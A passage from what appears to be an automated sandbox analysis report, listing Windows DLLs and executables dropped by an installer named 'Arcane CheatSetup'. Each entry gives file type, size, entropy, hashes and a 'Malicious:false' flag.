                                SHA-512:D7520A28C3054160FCD62C9D816A27266BE9333E00794434FB4529F0FF49A2B08E033B5E67A823E5C184EE2D19D7F615FF9EE643FE71C84011A7E5C03251F3B4
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):86592
                                Entropy (8bit):6.686302444148156
                                Encrypted:false
                                SSDEEP:1536:/QsPinZd9lmzFRQnJ9sSpkWgVenAe7C3xWxNO3A4:lPE9lEmtpkj7eqWxNCA4
                                MD5:5E6DDF7CF25FD493B8A1A769EF4C78F7
                                SHA1:42748051176B776467A31885BB2889C33B780F2D
                                SHA-256:B9BEACA57BFF23C953917C0B2037351EF3334E6A9DE447DCA6542FE5C815BF9F
                                SHA-512:C47F742F064B99E5B9C2BDEAC97472D9D8C9466C9071E9799AF79F820199D9B30B198C33EF635F07A972B77475AFEA9E7417AA6335D22A7380E7B0E552869C18
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):22592
                                Entropy (8bit):6.620820751411794
                                Encrypted:false
                                SSDEEP:384:YL4Z7lZRiY3PB6cGgOp2m1zq2oatSnPV5zYxkpLfsnYPLr7Ybc:E4PZRiY3PB6cVAebaMnd+ypLkC7Cc
                                MD5:700F5789D2E7B14B2F5DE9FDB755762E
                                SHA1:F35EDE3441D6E5461F507B65B78664A6C425E9AC
                                SHA-256:D115EAF96BD41C7A46400DCFF7EF26AC99E3CF7A55A354855C86BAE5C69A895A
                                SHA-512:664A442DD424CA04AC0CE072B9BBD5EF7C657B59A26403C44A856738F7998466BFE3010825A13451281841D39B0A34D8997EE24497D626EC60C19AA1AF0EE465
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):51264
                                Entropy (8bit):6.565433654691718
                                Encrypted:false
                                SSDEEP:768:a+BEJER/xSW/EoB8VBQZbKYawLysHFhIAqQbQMD8YpwQ+Qi4v8qUYVC7R:a+BEJERvQGbKnwusjIAq08YDi4UqUYoR
                                MD5:95EDB3CB2E2333C146A4DD489CE67CBD
                                SHA1:79013586A6E65E2E1F80E5CAF9E2AA15B7363F9A
                                SHA-256:96CF590BDDFD90086476E012D9F48A9A696EFC054852EF626B43D6D62E72AF31
                                SHA-512:AB671F1BCE915D748EE49518CC2A666A2715B329CAB4AB8F6B9A975C99C146BB095F7A4284CD2AAF4A5B4FCF4F939F54853AF3B3ACC4205F89ED2BA8A33BB553
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):70208
                                Entropy (8bit):6.353501201479367
                                Encrypted:false
                                SSDEEP:768:jFVfr2k521ZnrawwMmqPXt+rP3b/9/YMCxx0OpPOrEE14EVHLAuDeGJiqrmehiV9:PxioMmqF+2x0MORLVq7qjh3rmKPNpwGg
                                MD5:C2A59C7343D370BC57765896490331E5
                                SHA1:A50AF979E08A65EB370763A7F70CDB0E179D705D
                                SHA-256:40614FE8B91E01AD3562102E440BDBF5FAC5D9F7292C6B16A58F723BFFFE6066
                                SHA-512:CA266F1B2E51F66D119E2D71E3377C229A3D583853FFB606C101AFEB41689ACE7D1F1594781091DA67F9BE9D09F3019BF048C0F819777E8F1827A56BEEC252C4
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):16448
                                Entropy (8bit):6.490137326885244
                                Encrypted:false
                                SSDEEP:384:WCMJqfiSZzDonPV5TyVIbb8nYPLr7VblXT:WLJqrNkndQIsC7Vhj
                                MD5:1F004C428E01F8BEB07B52EB9659A661
                                SHA1:4D6AAB306CB1F4925890BF69FCDF32BBFE942B81
                                SHA-256:1BDEFECDF8CFA3F6DA606AD4D8BD98EC81E4A244D459A141723CCB9DC47E57CB
                                SHA-512:61888A778394950D2840E4D211196FFE1CB18FA45D092CBADBEDF2809BDED3D4421330CFE95392DD098E4AE3F6F8A3070E273FFCA2FB495C43C76332CA331DBF
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):51264
                                Entropy (8bit):6.576803205025954
                                Encrypted:false
                                SSDEEP:1536:urOHh9t7/GAzqHcGxAARrZT9ixHDyo/r0rV9LrBH1bjPEwhEdheBwHWQFgE/XudL:G+9t7/qHcGHuy/pb
                                MD5:3A744B78C57CFADC772C6DE406B6B31E
                                SHA1:A89BF280453C0BCF8C987B351C168AEB3D7F7141
                                SHA-256:629393079539B1B9849704CE4757714D1CBE5C80E82C6BB3BC4445F4854EFA7B
                                SHA-512:506A147F33C09FA7338E0560F850E42139D0875EF48C297DDB3CC3A29F12822011915FACCB21DA908CF51A462F0EBA56B6B37C71D9C0F842BDE4A697FB4FFB64
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):19520
                                Entropy (8bit):6.452867740862137
                                Encrypted:false
                                SSDEEP:384:45kF/QP8xkI6hgWIE0PVlyJSZ9nYPLr7+:4SqP7I6rkd4EfC7+
                                MD5:503275E515E3F2770A62D11E386EADBF
                                SHA1:C7BE65796AA0E490779F202C67EEC5E9FBB65113
                                SHA-256:97B5D1C8E7AAACE5C86A418CB7418D3B0BA4F5E178DE3CF1031029F7F36832AF
                                SHA-512:AC7C0CB626C2D821F0F4E392EE4E02C9E0093F019AA5B2947E0C7B3290A0098A3D9BB803AB44FD304CA1F1D272CFB7B775E3C75C72C7523FF7240F38440CFC3C
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):30784
                                Entropy (8bit):6.413942547146628
                                Encrypted:false
                                SSDEEP:768:+HhfWinfwUFAvnb5TIUX+naSOu9MQQ5jhC7EY:cuin5FAvNTIUX+nbMQQ54EY
                                MD5:530D5597E565654D378F3C87654CCABA
                                SHA1:6FAC0866EE0E68149AC0A0D39097CEF8F93A5D9E
                                SHA-256:0CFAA99AE669DDC00BD59B5857F725DFF5D4C09834E143AB1B5C5F0B5801D13B
                                SHA-512:D7520A28C3054160FCD62C9D816A27266BE9333E00794434FB4529F0FF49A2B08E033B5E67A823E5C184EE2D19D7F615FF9EE643FE71C84011A7E5C03251F3B4
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.466457942735197
                                Encrypted:false
                                SSDEEP:384:GpsbHnDiW6gejmSHhV8cGees7snYPLr7Wj53:GpsbHn/HS/8cresgC743
                                MD5:CF2F023D2B5F0BFB2ECF8AEEA7C51481
                                SHA1:6EB867B1AC656A0FC363DFAE4E2D582606D100FB
                                SHA-256:355366D0C7D7406E2319C90DF2080C0FAE72D9D54E4563C48A09F55CA68D6B0C
                                SHA-512:A2041925039238235ADC5FE8A9B818DFF577C6EA3C55A0DE08DA3DEDD8CD50DC240432BA1A0AEA5E8830DCDCCD3BFBF9CF8A4F21E9B56DC839E074E156FC008D
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):126528
                                Entropy (8bit):6.8082748642937725
                                Encrypted:false
                                SSDEEP:3072:Kw2b3Kr+uWU9XzFhziJ1TBZAhsIn/B9NZwMgjeNXLD:43KFFheLCBpV/
                                MD5:73BD0B62B158C5A8D0CE92064600620D
                                SHA1:63C74250C17F75FE6356B649C484AD5936C3E871
                                SHA-256:E7B870DEB08BC864FA7FD4DEC67CEF15896FE802FAFB3009E1B7724625D7DA30
                                SHA-512:EBA1CF977365446B35740471882C5209773A313DE653404A8D603245417D32A4E9F23E3B6CD85721143D2F9A0E46ED330C3D8BA8C24AEE390D137F9B5CD68D8F
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):191040
                                Entropy (8bit):6.75061028420578
                                Encrypted:false
                                SSDEEP:3072:iUJiEoGLsncZizZQ7QBdCPdG3TBfMzrjZqMNGSplN2:iUJsnVzy7QBdC1G3TBEvFp6
                                MD5:E3E51A21B00CDDE757E4247257AA7891
                                SHA1:7F9E30153F1DF738179FFF084FCDBC4DAE697D18
                                SHA-256:7E92648B919932C0FBFE56E9645D785D9E18F4A608DF06E7C0E84F7CB7401B54
                                SHA-512:FC2981A1C4B2A1A3E7B28F7BF2BE44B0B6435FD43F085120946778F5C2C2CA73AD179796DEC0B92F0C6C8F6B63DD329EECC0AF1BB15392364C209DCF9CD6F7CA
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):23616
                                Entropy (8bit):6.620094371728742
                                Encrypted:false
                                SSDEEP:384:Qp2dG5pC/ujTc8ZrEnrZm8WXLFnPV52WZQAnYPLr7lOGa:uvCGjJ0Q9ndRZdC71a
                                MD5:1C47DD47EBD106C9E2279C7FCB576833
                                SHA1:3BA9B89D9B265D8CEC6B5D6F80F7A28D2030A2D1
                                SHA-256:58914AD5737F2DD3D50418A89ABBB7B30A0BD8C340A1975197EEA02B9E4F25B2
                                SHA-512:091F50B2E621ED80BAFE2541421906DE1BCC35A0E912055B93E40CD903BE8B474103C0D8FECDF46E7F2F3C44BDADE64A857AB2B9CB5404306055150EE4ED002A
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):160256
                                Entropy (8bit):6.469497559123052
                                Encrypted:false
                                SSDEEP:3072:a2lpElIhbyyH3c1CX766zKELxKvFaPSnjZqMNJlGle:a2rE+xdW+76DEVKv8wv
                                MD5:4E3C37A4DE0B5572D69AD79B7A388687
                                SHA1:6B274E166641F9CE0170E99FE2D1F4319B75A9E8
                                SHA-256:893A86E7B1DE81DEDAB4794732FCCD02790756A2DBE4815C102F039088DFCBD2
                                SHA-512:8352A1CD859D17A27560448C6FFB0E8200096CAC744C8BB56330397FDE0B7F702E2295999D89FBAD74DF72DF200C391113A23A9B4342ABAC738167967533F9CD
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):70208
                                Entropy (8bit):6.353501201479367
                                Encrypted:false
                                SSDEEP:768:jFVfr2k521ZnrawwMmqPXt+rP3b/9/YMCxx0OpPOrEE14EVHLAuDeGJiqrmehiV9:PxioMmqF+2x0MORLVq7qjh3rmKPNpwGg
                                MD5:C2A59C7343D370BC57765896490331E5
                                SHA1:A50AF979E08A65EB370763A7F70CDB0E179D705D
                                SHA-256:40614FE8B91E01AD3562102E440BDBF5FAC5D9F7292C6B16A58F723BFFFE6066
                                SHA-512:CA266F1B2E51F66D119E2D71E3377C229A3D583853FFB606C101AFEB41689ACE7D1F1594781091DA67F9BE9D09F3019BF048C0F819777E8F1827A56BEEC252C4
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):57408
                                Entropy (8bit):6.6711491011490285
                                Encrypted:false
                                SSDEEP:1536:f6arRmcnq2lxm+Na6C7HIT6T8E2pLSSm3:fzm+q7HITS8E2pLSSA
                                MD5:AEADA06201BB8F5416D5F934AAA29C87
                                SHA1:35BB59FEBE946FB869E5DA6500AB3C32985D3930
                                SHA-256:F8F0B1E283FD94BD87ABCA162E41AFB36DA219386B87B0F6A7E880E99073BDA3
                                SHA-512:89BAD9D1115D030B98E49469275872FFF52D8E394FE3F240282696CF31BCCF0B87FF5A0E9A697A05BEFCFE9B24772D65ED73C5DBD168EED111700CAAD5808A78
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):446528
                                Entropy (8bit):6.603555069382601
                                Encrypted:false
                                SSDEEP:12288:RreTVhY4gXwLR4YS+OX3kQg4O5kM2LY58gwDTxXvwGSelo:Rr4VhyK7eTxXvwelo
                                MD5:8AE40822B18B10494527CA3842F821D9
                                SHA1:202DFFA7541AD0FAD4F0D30CEE8C13591DCA5271
                                SHA-256:C9742396B80A2241CE5309C388B80000D0786A3CAB06A37990B7690FD0703634
                                SHA-512:AA324A265639C67843B4BF6828029B413044CBE4D7F06A253B78B060EA554FECC6E803D59D03742C485B2EB3D52E5C0A44928DCC927501F413EE4664BB8A11F5
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):126016
                                Entropy (8bit):6.608910794554507
                                Encrypted:false
                                SSDEEP:3072:oOxjjADzd+aeaPB9JhjxkM2wzGdXJbD/jn8Y6:ocKzeaPB9JhjxknwzG5JbDb8F
                                MD5:01706B7997730EAA9E2C3989A1847CA6
                                SHA1:7CEAD73CBE94E824FA5E44429B27069384BFDB41
                                SHA-256:20533C66C63DA6C2D4B66B315FFCF5C93AE5416E3DAE68CDD2047EFE7958AB3A
                                SHA-512:3272C8DE6C32D53372D481441DA81AE2B6EA02E8360B23D7F793B24827BD683A6604F43BE18CE2BEE40038FBE7D5F7AF78B2C465A51F82478D881DBEB5744DC2
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):191552
                                Entropy (8bit):6.744419946343284
                                Encrypted:false
                                SSDEEP:3072:lScg0xvhTZNIs3Ft+STckCBQo3C0Y22vncTBfsO9jZqMN3cH1Tefqk:lSclI6nTc3BQo3C0YHncTBxvs65
                                MD5:48C96771106DBDD5D42BBA3772E4B414
                                SHA1:E84749B99EB491E40A62ED2E92E4D7A790D09273
                                SHA-256:A96D26428942065411B1B32811AFD4C5557C21F1D9430F3696AA2BA4C4AC5F22
                                SHA-512:9F891C787EB8CEED30A4E16D8E54208FA9B19F72EEEC55B9F12D30DC8B63E5A798A16B1CCC8CEA3E986191822C4D37AEDB556E534D2EB24E4A02259555D56A2C
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):269888
                                Entropy (8bit):6.418120581797452
                                Encrypted:false
                                SSDEEP:6144:Fp9B0qT85g5Sq+VBY2qVLC2wH5rM8HoQvlHO:5uqT85sSq+ERVm2wZEQvlHO
                                MD5:F8211DB97BF852C3292C3E9C710C19D9
                                SHA1:46DAD07779E030D8D1214AFE11C4526D9F084051
                                SHA-256:ECF4307739CA93F1569CE49377A28B31FE1EB0F44B6950DBAAFA1925B24C9752
                                SHA-512:B3E20EECA87136CAE77F06E4149E65EBFEF71A43589F7E2833008FE43811A2BC8B6202B6ADB5CE122A1822E83CE226B833DEF93A2B161476BD5B623794E4F697
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):13888
                                Entropy (8bit):6.274978807671468
                                Encrypted:false
                                SSDEEP:192:ahKnvndLwm3XLPVlD6yTUZnYe+PjPriT0fwdNJLkoRz:a4j7PVl1TAnYPLr7cLka
                                MD5:0291BA5765EE11F36C0040B1F6E821FB
                                SHA1:FFE1DCF575CCD0374DF005E9B01D89F6D7095833
                                SHA-256:F8540BE2BBD5BDE7962D2FE4E7EC9EF9BF53D95B48781AE549AA792F10032485
                                SHA-512:72ADDC631D8CF064E1B047B51EEF7F306CA959D24ED705065C33EE8DDDF7EA84B95B3DE5B0709015A81D36ACA01E15CE99A354D4069D4D798ED128A6A76D1010
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):163904
                                Entropy (8bit):6.783788147675078
                                Encrypted:false
                                SSDEEP:3072:XrQPwE5tlGsXVomHvD+1febSICzqozXtrQwnNZkB+5:XU15tpX9HvsfrTtMwNWBY
                                MD5:6E08D65F5CBB85E51010F36A84FC181D
                                SHA1:4EEE8BE68BAAF6320AEA29131A1C0B322F09F087
                                SHA-256:2D8658909D9E357A4B70FCF862D690EEC82A2F77161ABB021E0839C6A67D4825
                                SHA-512:DF4494D062E9A8AC82D727D2722DCF32C3FC924FA104F384FA099ADB08ECBDEEA7A19245D779097C0AFCF51F84852328ED595C88380F42BD39560678C8AD9621
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):22592
                                Entropy (8bit):6.620820751411794
                                Encrypted:false
                                SSDEEP:384:YL4Z7lZRiY3PB6cGgOp2m1zq2oatSnPV5zYxkpLfsnYPLr7Ybc:E4PZRiY3PB6cVAebaMnd+ypLkC7Cc
                                MD5:700F5789D2E7B14B2F5DE9FDB755762E
                                SHA1:F35EDE3441D6E5461F507B65B78664A6C425E9AC
                                SHA-256:D115EAF96BD41C7A46400DCFF7EF26AC99E3CF7A55A354855C86BAE5C69A895A
                                SHA-512:664A442DD424CA04AC0CE072B9BBD5EF7C657B59A26403C44A856738F7998466BFE3010825A13451281841D39B0A34D8997EE24497D626EC60C19AA1AF0EE465
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):115264
                                Entropy (8bit):6.588792190592223
                                Encrypted:false
                                SSDEEP:3072:2Cgsy+/cydqNiaZr+lOzZPh7/W4MCnc8Ioaa2yFWcC6vsx/8:FZOzZPh7/WSe+S6v+U
                                MD5:8BC8FE64128F6D79863BC059D9CC0E2E
                                SHA1:C1F2018F656D5500ACF8FA5C970E51A55004DA2E
                                SHA-256:B77CD78FF90361E7F654983856EE9697FDC68A0F9081C06207B691B0C9AF1F5D
                                SHA-512:6771F23ECF1A449EB6B0B394E0F1D3EB17C973FC0544BA25487C92F215ACC234FC31C9B7BE5528EFD06D29A35BB37DD7934318837576862ADFC2631B4D610A24
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):33934912
                                Entropy (8bit):6.35314231534845
                                Encrypted:false
                                SSDEEP:393216:VJ8d7SMzwH5R2sdDcBwHHdI4DKRlDsqXCagQZhzvilh2Wlq7ODI:VJ8d7zzUesdDtevn
                                MD5:4D857A5FC9CA16D2A67872FACCF85D9F
                                SHA1:EAEB632E526EFA946E4DB1B8CFA31DE6A7B03219
                                SHA-256:7FFA7423DDA07499394B345E5ECE2D54C8E19247E6E76C0E23B5BF1470AB0D7F
                                SHA-512:8DBC8675CE2DACE8D629C3FA66CF65704346AB829AE0B0A1D7B25BE22783B7E73624BA70F6D67264D6CA1656D7590E3753A8DF2227DA45112C5BD4A5654089AF
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.475020301731584
                                Encrypted:false
                                SSDEEP:384:GpsE5cnm6ObmSHhV8j0eeq4SziahnYPLr79OOu:Gpszn6iS/8jxeqfhC78Ou
                                MD5:4F11D43AA2215CE771DA528878F01C8E
                                SHA1:8062681D73489FF200CA0BA426FF1FF3F44494A7
                                SHA-256:0D554CD4B373D6D9B9C179A468D179388706C0BDE4D878ED75EF575651588B3C
                                SHA-512:34CB271C32FB479CFAEEC536A5D35A41730E90001D67DC9DB595DB240A1F58C3BF12334BB5CDE7673C8E56A4C272BFBD66E4EACDEE0082F6FD583E4E039EC540
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):158784
                                Entropy (8bit):6.816453355323999
                                Encrypted:false
                                SSDEEP:3072:gLkNbBRaz4rQWiG6wMz9/S3en9pHUw06TBfkqI44:rNbB4Mcnv7z6en9pj06TB6
                                MD5:73A76EC257BD5574D9DB43DF2A3BB27F
                                SHA1:2C9248EAE2F9F5F610F6A1DFD799B0598DA00368
                                SHA-256:8F19B1BA9295F87E701C46CB888222BB7E79C6EE74B09237D3313E174AE0154F
                                SHA-512:59ECD5FCF35745BDADCDB94456CB51BB7EA305647C164FE73D42E87F226528D1A53CE732F5EC64CE5B4581FA8A17CFBFDC8173E103AE862D6E92EB3AD3638518
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):207424
                                Entropy (8bit):6.630800216665857
                                Encrypted:false
                                SSDEEP:6144:ckZ5ktGCru8e6Y3RhNw0mjs+OBS7n7ACKRAHbW:ciIbS6Y37Nw0/QC
                                MD5:475DD87198F9C48EFB08AAB4ADE8AF5A
                                SHA1:9B657E0837639663D4D721F8C5E25401F11E7BEB
                                SHA-256:32764005FCCE7D0E51801528F6B68C860979E08D027A5220DFEC19B2A8013354
                                SHA-512:0B492B0FBADC14178A6F79A58E47C30D92B59B18414E38A7B119699D0788ACF3713F925CF0EC570BE3E29AB26BDB6B567C38526BC0603BA78ECC3E2952EA3E2B
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):82496
                                Entropy (8bit):6.597347722250847
                                Encrypted:false
                                SSDEEP:1536:ez2dfBusTTkMffX+xR5kdt94u+508AqDfJOqsbCkq24maADX:kE5u+kkX+P+dt9O08JJOZXX4nADX
                                MD5:5F85F7F2DFAC397D642834B61809240F
                                SHA1:ECA28E8464208FA11EF7DF677B741CDD561483D9
                                SHA-256:B71E00ADB77D87882D58993A5888955BDD62C57D364F60AAA0FA19D32A69C9DA
                                SHA-512:2BFE9FCE450E57EA93DEEAA85A746CB17BA946EEFF866F10D67C74F7EA038B16910E0D8EF29E9F358AF7DAABD45E3983C370FEF82A9647546819DCDE3AEE45BC
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):19008
                                Entropy (8bit):6.372096409611824
                                Encrypted:false
                                SSDEEP:384:PTjlu57T5J5eFeYW7TPVlN3B+ASZQ4NNR7F3qnYPLr7om0:PnUd5eFeDfd5Sj7oC7om0
                                MD5:4023E25F92B5F13E792901BF112A8EA2
                                SHA1:31ADCD411905832B89EA55DEC8B9C83AF3C7D3EA
                                SHA-256:432AEDAC59FA161FED5A5D95CA5F8CFD1D73A35ABE8A7090D137100F727B687B
                                SHA-512:AD0E6F8071EB09E843989E637BACA988DD7706D84FC26DB7C2E18BBE03A78A6C5BFE4F1B28289B5929B2B86C53FB6C3DAE42523DC8EDE8057A8F431AEA77BB20
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):186944
                                Entropy (8bit):6.612459610032652
                                Encrypted:false
                                SSDEEP:3072:XsSFQQB7SGWV2xrkvql6QPJD7mGVqjLypDTaDE5zwmFxy7HglbZrdIG:XJ97PxYAPJ/RV0tDCzw+xy0ldOG
                                MD5:E9373908186D0DA1F9EAD4D1FDAD474B
                                SHA1:C835A6B2E833A0743B1E8F6F947CFE5625FE791F
                                SHA-256:E2FBD6C6334D4765FF8DFF5C5FE3DF8B50015D0BF9124142748FADB987B492FF
                                SHA-512:BFDC236D462DAC45FD63C112E40558ED4E11E76FB4D713926A679FD573F67FA16451231A03178926B76BD267F092A33A3B6760CF4812DE2679BB9505B83F8261
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):145984
                                Entropy (8bit):6.69725055196282
                                Encrypted:false
                                SSDEEP:3072:S2yRKm4/j/dKLnjHy7OMD+MqS1RYio7+oD33GnUV0fem2M:S2ytqlYnjHehDzqiq+oD33OUV8Vx
                                MD5:4294D39CC9E5F23754D41B9DDE710112
                                SHA1:1BAA1E136F18108AB4E31EC005DEC54FC3F23A7C
                                SHA-256:DE3EEDED01B35DC7C29B0B758211BB1DB73CCFFB9298D281DAF56924ED9E93CB
                                SHA-512:E88DFF129DD35445B32A2DBCAB97CF752E9ACDF82FF88B184FA6D3B461D55BD2D195794802C5BA5E7EFFA086DC89E0C2CEF0C8B0BFA29AC70B75CFB1B4B0584C
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):16448
                                Entropy (8bit):6.482296988184946
                                Encrypted:false
                                SSDEEP:384:n11I27Bf0jeZy+hiqEyRoPV527rBnYPLr7/U:nrJfYqodYJC78
                                MD5:4BDF31D370F8A893A22820A3B291CC1D
                                SHA1:BD27656B42F881EEE1940CFE15CF84C1938B57BA
                                SHA-256:C98DFAC99CC1E05D5F86B2577031A7624DCC13D0A8344B2855F166335177BC16
                                SHA-512:51623274C13DA71AD01DBAD7950444B512F08C3DC04E27F0321DF02E9F3C4DFB308DEF35F58524CCCCE79ED2A8859D85C16DC0D9BEA378E5538E23602D35AA76
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):30784
                                Entropy (8bit):6.609051738644882
                                Encrypted:false
                                SSDEEP:384:mk87qhVj8sqgP7CRLMOPfkGo7UdJs0flkg2uG8RPGHTR5ny5pnYPLr7z:mk87qhVjaMOPJdJFflLJR+V03C7z
                                MD5:7BD914407C6D236B27865A8C63147B7F
                                SHA1:9B49E48705341D30E3F92B85652E924C7985E415
                                SHA-256:549849DC910261D817670B192715430395993E811D0FD3103651237D7F18929D
                                SHA-512:624DC95F696BEA311726EAFB0017F363C8703B95A2E08DE984C642867888CF5B9172326C2E2567ED4A2EA28F806B633840552C80BE49EB6CF2A8FC4A0C259117
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):27712
                                Entropy (8bit):6.6264206752006825
                                Encrypted:false
                                SSDEEP:768:hgWe1DWI+mB7JkJKe3xVF2XNbuHEqe8yIGn3zY9pcQ/oGmEsg0sqkgiHmNs2Qd6X:qWbEK1Ms2dYJG
                                MD5:6280201C1918EA3293919BB282D2B563
                                SHA1:3F6F5299A435E2A0C36BE8AAD4CB2FCAACD0897D
                                SHA-256:0711127A297E4CC1927D77013FC040CAA26930C34A4C7B4D7631BCE9C8041B74
                                SHA-512:A4C4507ED4FDEC038FAFA62970161E7B75FF9A2ABBDF854ED55483144DCDC0FC9D21235FDDDF1B38303723F9C615AE388397C4D17B5391D8827A5B40AC52C5FC
                                Malicious:false
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
